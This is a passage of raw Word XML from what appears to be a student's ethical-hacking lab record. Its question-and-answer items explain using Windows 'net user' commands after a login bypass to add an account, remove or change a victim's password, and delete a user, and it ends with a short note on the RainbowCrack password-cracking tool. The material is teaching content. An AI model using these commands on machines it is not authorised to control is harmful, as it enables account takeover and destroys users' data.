              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>In Windows, the "net user" command can be used to create a new user after a login bypass. The syntax for creating a new user is "net user username password /add". For example, to create a new user named "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>newuser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">" with the password "password123", the command would be "net user </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>newuser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> password123 /add".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA9B204" w14:textId="77777777" w:rsidR="00847AD0" w:rsidRPr="001C411D" w:rsidRDefault="00847AD0" w:rsidP="00847AD0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="757AF088" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>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How to remove the password of a victim's Window machine?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="297F59F6" w14:textId="77777777" w:rsidR="00847AD0" w:rsidRPr="00847AD0" w:rsidRDefault="00847AD0" w:rsidP="00847AD0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>To remove the password of a victim's Windows machine, you can use the command "net user" in combination with the username of the victim's account. The syntax for removing a password is "net user username *". When prompted to enter a new password, simply press Enter without entering any value. This will remove the password for the user account.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C627DC2" w14:textId="77777777" w:rsidR="00847AD0" w:rsidRDefault="00847AD0" w:rsidP="00847AD0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2EAAAE4A" w14:textId="06459AA0" w:rsidR="00847AD0" w:rsidRPr="00847AD0" w:rsidRDefault="00841062" w:rsidP="00847AD0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>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How to change the password of a victim's Window machine?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64ED2A77" w14:textId="77777777" w:rsidR="00847AD0" w:rsidRPr="00847AD0" w:rsidRDefault="00847AD0" w:rsidP="00847AD0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">To change the password of a victim's Windows machine, you can use the "net user" command in combination with the username of the victim's account. The syntax for changing a password </w:t>
            </w:r>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">is "net user username </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>newpassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>". For example, to change the password for a user named "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>johndoe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">" to "newpassword123", the command would be "net user </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>johndoe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> newpassword123".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="527C4E25" w14:textId="77777777" w:rsidR="00847AD0" w:rsidRPr="001C411D" w:rsidRDefault="00847AD0" w:rsidP="00847AD0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="780B25E6" w14:textId="77777777" w:rsidR="00841062" w:rsidRDefault="00841062" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>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the purpose of the following command: net user gg /delete </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C61EBBB" w14:textId="77777777" w:rsidR="00847AD0" w:rsidRPr="00847AD0" w:rsidRDefault="00847AD0" w:rsidP="00847AD0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>The command "net user gg /delete" is used to delete a user account named "gg" from a Windows machine. This command will permanently delete the user account and all associated files and data. This command should be used with caution, as it cannot be undone.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BF88CB5" w14:textId="77777777" w:rsidR="00847AD0" w:rsidRPr="001C411D" w:rsidRDefault="00847AD0" w:rsidP="00847AD0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="379809EB" w14:textId="4BCD4964" w:rsidR="00847AD0" w:rsidRPr="00847AD0" w:rsidRDefault="00841062" w:rsidP="00847AD0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>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rite a short note on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>RainbowCrack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>tool.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB9F292" w14:textId="5EC145E0" w:rsidR="00847AD0" w:rsidRPr="00847AD0" w:rsidRDefault="00847AD0" w:rsidP="00847AD0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>RainbowCrack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> is a popular password cracking tool that is used to crack password hashes using precomputed tables called "rainbow tables". These tables contain a large number of precomputed hash chains that can be used to crack password hashes quickly. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>RainbowCrack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> supports a wide range of hash types and can be used on both Windows and LINUX systems. However, it is important to note that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>RainbowCrack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00847AD0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> is illegal to use on password hashes without permission from the owner of the system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="576F769C" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00841062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2635BB" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00841062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E838D3" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00841062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E6432AB" w14:textId="77777777" w:rsidR="004307F9" w:rsidRDefault="004307F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8D417" w14:textId="6488C7C1" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="0084106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0A4D3D3E" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="0084106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5033208E" w14:textId="215D9D43" w:rsidR="00841062" w:rsidRDefault="00BA16BF" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1042623F" wp14:editId="1FB8C43E">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5C5962B" w14:textId="115A925D" w:rsidR="00BA16BF" w:rsidRDefault="00BA16BF" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B6309DF" wp14:editId="7E507467">
            <wp:extent cx="5943600" cy="3342640"/>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5739C0F" w14:textId="77777777" w:rsidR="00C563E4" w:rsidRDefault="00C563E4" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512A915A" w14:textId="77777777" w:rsidR="00C563E4" w:rsidRDefault="00C563E4" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318540BD" w14:textId="77777777" w:rsidR="00C563E4" w:rsidRDefault="00C563E4" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E90EE69" w14:textId="65746916" w:rsidR="00C563E4" w:rsidRDefault="00C563E4" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56B3A255" wp14:editId="26EB4C48">
            <wp:extent cx="5943600" cy="3342640"/>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7752ECB" w14:textId="47BB2DF7" w:rsidR="00C563E4" w:rsidRDefault="00C563E4" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="203FBF8A" wp14:editId="7F06AE6F">
            <wp:extent cx="5943600" cy="3342640"/>
            <wp:effectExtent l="0" t="0" r="0" b="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video gam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B4D672E" w14:textId="77777777" w:rsidR="00C563E4" w:rsidRDefault="00C563E4" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AB715C" w14:textId="77777777" w:rsidR="00C563E4" w:rsidRDefault="00C563E4" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615C673A" w14:textId="317CBF4E" w:rsidR="00C563E4" w:rsidRDefault="00C563E4" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="584D5314" wp14:editId="5A2AD5FC">
            <wp:extent cx="5943600" cy="3342640"/>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2DAAF3A" w14:textId="7421A6DF" w:rsidR="00C563E4" w:rsidRDefault="00C563E4" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78243EC7" wp14:editId="0BAC19F1">
            <wp:extent cx="5943600" cy="3342640"/>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829BED7" w14:textId="77777777" w:rsidR="00C563E4" w:rsidRPr="001C411D" w:rsidRDefault="00C563E4" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5474C7CB" w14:textId="77777777" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00841062" w:rsidP="00841062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689F602E" w14:textId="14F8B81E" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="00BE1412" w:rsidP="00841062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">EXPERIMENT NO. </w:t>
      </w:r>
      <w:r w:rsidR="0009724E" w:rsidRPr="001C411D">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436DE" w:rsidRPr="001C411D" w14:paraId="0B3379DA" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DCDE608"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4ECC35A9" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004436DE" w:rsidRPr="001C411D" w14:paraId="66F5D233" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EFE8B62"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48FE8309" w14:textId="77777777" w:rsidR="004436DE" w:rsidRPr="001C411D" w:rsidRDefault="004436DE" w:rsidP="004436DE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004436DE" w:rsidRPr="001C411D" w14:paraId="2825E41F" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
